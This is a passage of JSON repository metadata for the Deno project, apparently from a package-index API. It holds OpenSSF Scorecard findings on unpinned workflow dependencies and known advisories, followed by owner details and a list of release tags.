GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/ma